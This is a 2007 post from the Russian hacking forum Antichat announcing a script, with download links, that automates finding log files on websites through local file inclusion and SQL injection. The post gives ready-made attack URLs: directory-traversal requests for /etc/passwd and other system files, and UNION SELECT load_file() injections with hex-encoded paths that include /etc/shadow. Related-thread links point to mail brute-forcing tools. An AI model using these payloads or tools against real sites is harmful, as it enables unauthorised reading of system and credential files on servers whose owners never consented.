ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу LogS--ToolS
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

LogS--ToolS
  #1  
Старый 23.09.2007, 17:54
NOmeR1
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777

Репутация: 2642


Отправить сообщение для NOmeR1 с помощью ICQ
По умолчанию LogS--ToolS
Написал скрипт, который автоматически ищет логи, при локальном инклуде и SQL инъекции.
В файл dirs.txt записываем диры, которые надо проверить.

Download:
- [0x57656246696C652E7275]
- [0xSLIL.0xRU]

Скрипт может не работать если:
- Не выводится ошибка
- Вы неверно ввели урл

Сокеты не нужны.

Подходящий хостинг - ueuo.com

Примеры:
1. PHP-Inj:
- Пишем url: http://site.ru/include.php?file=[php]
- Результат
Цитата:
http://site.ru/include.php?file=../../../../../../../../../../../../etc/passwd
http://site.ru/include.php?file=../../../../../../../../../../../../etc/hosts
http://site.ru/include.php?file=../../../../../../../../../../../../etc/ftpusers
http://site.ru/include.php?file=../../../../../../../../../../../../etc/syslog.conf
http://site.ru/include.php?file=../../../../../../../../../../../../etc/services
http://site.ru/include.php?file=../../../../../../../../../../../../etc/group
http://site.ru/include.php?file=../../../../../../../../../../../../etc/bash.bashrc
http://site.ru/include.php?file=../../../../../../../../../../../../etc/profile
http://site.ru/include.php?file=../../../../../../../../../../../../etc/skel/.bashrc
2. SQL-Inj:
- Пишем url: http://site.ru/users.php?id=[sql]
- Колумнов: 12
- Ставим запрос на: 7
- Результат
Цитата:
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 06173737764),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 36861646f77),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f6 86f737473),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 365727669636573),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f6 7726f7570),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f6 e6574776f726b73),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 0726f66696c65),8,9,10,11,12
http://site.ru/users.php?id=-1+union+select+1,2,3,4,5,6,load_file(0x2f6574632f7 36b656c2f2e626173687263),8,9,10,11,12
Смотрите также
- Mail.Ru BruteForce
- Rambler.Ru
Последний раз редактировалось NOmeR1; 30.10.2007 в 00:40..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Сборник полезных прог! (Must Have!) PEPSICOLA Soft - Windows 388 11.05.2010 12:27
XSS в Online tools от puremango BlackCats Уязвимости 1 29.09.2007 00:20
Steps To Deface A Webpage (About Defacers) bxN5 Forum for discussion of ANTICHAT 3 11.03.2007 03:04



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ